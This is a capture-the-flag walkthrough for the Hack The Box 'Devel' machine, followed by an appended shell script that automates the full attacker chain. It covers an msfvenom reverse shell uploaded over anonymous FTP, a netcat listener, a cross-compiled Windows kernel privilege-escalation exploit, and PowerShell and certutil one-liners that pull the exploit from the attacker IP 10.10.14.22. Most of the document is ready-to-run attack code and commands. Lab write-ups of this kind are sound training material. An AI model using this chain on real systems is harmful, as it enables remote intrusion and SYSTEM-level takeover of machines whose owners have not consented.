I’m skipping Blue since it’s the same as Legacy and moving on to Devel.
For exploitation I used the following steps.
From the nmap scan I found out that anonymous login is enabled for FTP.
Once logged in, I found that the anonymous user has rights to push files into the webserver’s root. I created a reverse shell using msfvenom and uploaded it.
From the browser I went to the URL with netcat listening and got a low-privilege Windows shell. From systeminfo I found out that it was a vulnerable build.
I searched for the exploit on Google and found one, then searched through searchsploit to find the same one.
I compiled the exploit using i686-w64-mingw32-gcc as instructed. If you don’t have it installed, you can install it by typing
apt install mingw-w64
After compiling the exploit, use SimpleHTTPServer (python -m SimpleHTTPServer; on Python 3 the equivalent is python3 -m http.server) to host it so it can be downloaded to the Windows box.
There are two ways to download this file to the Windows box from the command line:
1. Using PowerShell
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.22/exploit.exe', 'c:\Users\Public\Downloads\exploit.exe')"
2. Using certutil
certutil.exe -urlcache -split -f http://10.10.14.22/exploit.exe exploit.exe
After downloading the exploit, run it from the command line. We have NT AUTHORITY\SYSTEM.
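The whole attacker-side chain above (payload, anonymous FTP upload, cross-compile, hosting, listener, and the two Windows download one-liners) as one script. This is an added example, not code from the original write-up. It assumes things the write-up does not state: that the web root is served by IIS/ASP.NET (so the payload is an .aspx file), a listener port of 4444, a hypothetical exploit source file name exploit.c, and that msfvenom, curl, nc, python3 and sha256sum are present on the attacking box. The target IP is taken from the TARGET environment variable rather than guessed. It also adds the check a practitioner wants before running a kernel exploit on the box: the script prints the SHA-256 of the hosted exploit so it can be compared with certutil -hashfile on the Windows side, since a truncated download of a kernel exploit is a good way to blue-screen the target.

```shell
#!/bin/sh
# Added example, not part of the original write-up: attacker-side helper for
# the Devel workflow. Assumptions not stated on the page: IIS/ASP.NET web root
# (.aspx payload), LPORT 4444, exploit source named exploit.c, and msfvenom,
# curl, nc, python3 and sha256sum installed on the attacking box.
set -eu

LHOST="${LHOST:-10.10.14.22}"             # attacker IP used in the write-up
LPORT="${LPORT:-4444}"                    # assumed listener port
PAYLOAD="${PAYLOAD:-shell.aspx}"          # assumed payload format
EXPLOIT_SRC="${EXPLOIT_SRC:-exploit.c}"   # hypothetical name of the searchsploit source

# SHA-256 of a local file, so the copy on the Windows box can be checked with
# "certutil -hashfile <file> SHA256" before the kernel exploit is executed.
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Step 1: reverse shell that the anonymous FTP user can drop into the web root.
build_payload() {
    msfvenom -p windows/shell_reverse_tcp LHOST="$LHOST" LPORT="$LPORT" \
        -f aspx -o "$PAYLOAD"
}

# Step 2: anonymous FTP upload. TARGET (the Devel IP) must be set by the caller.
upload_payload() {
    curl --silent --show-error -T "$PAYLOAD" --user anonymous:anonymous \
        "ftp://${TARGET:?set TARGET to the Devel IP}/"
}

# Step 3: cross-compile the privilege escalation exploit for 32-bit Windows.
# Extra link flags (e.g. -lws2_32) depend on the exploit; follow its own notes.
build_exploit() {
    i686-w64-mingw32-gcc "$EXPLOIT_SRC" -o exploit.exe
}

# Step 4: host the exploit (python3 http.server is the Python 3 equivalent of
# SimpleHTTPServer) and catch the shell. Browsing to the uploaded .aspx on the
# target triggers the callback.
serve_and_listen() {
    python3 -m http.server 80 >/dev/null 2>&1 &
    echo "serving $(pwd) on http://$LHOST/ (pid $!)"
    nc -lvnp "$LPORT"
}

# Step 5: the two Windows download one-liners from the write-up with the URL
# filled in, plus the hash to verify on the target before running the exploit.
download_cmds() {
    name=$(basename "$1")
    win_dir='C:\Users\Public\Downloads'
    printf '%s\n' "powershell -c \"(new-object System.Net.WebClient).DownloadFile('http://$LHOST/$name', '$win_dir\\$name')\""
    printf '%s\n' "certutil.exe -urlcache -split -f http://$LHOST/$name $name"
    printf '%s\n' "certutil.exe -hashfile $name SHA256"
    printf '%s\n' "rem expected SHA256: $(file_sha256 "$1")"
}

main() {
    build_payload
    upload_payload
    build_exploit
    download_cmds exploit.exe
    serve_and_listen
}

# Only run the full chain when invoked as: TARGET=<ip> ./devel.sh run
case "${1:-}" in
    run) main ;;
esac
```

Run it with TARGET set to the box IP and the argument run; it prints the Windows-side commands to paste into the low-privilege shell and then blocks on the netcat listener. Compare the SHA-256 printed by certutil -hashfile on the target with the expected value before executing exploit.exe.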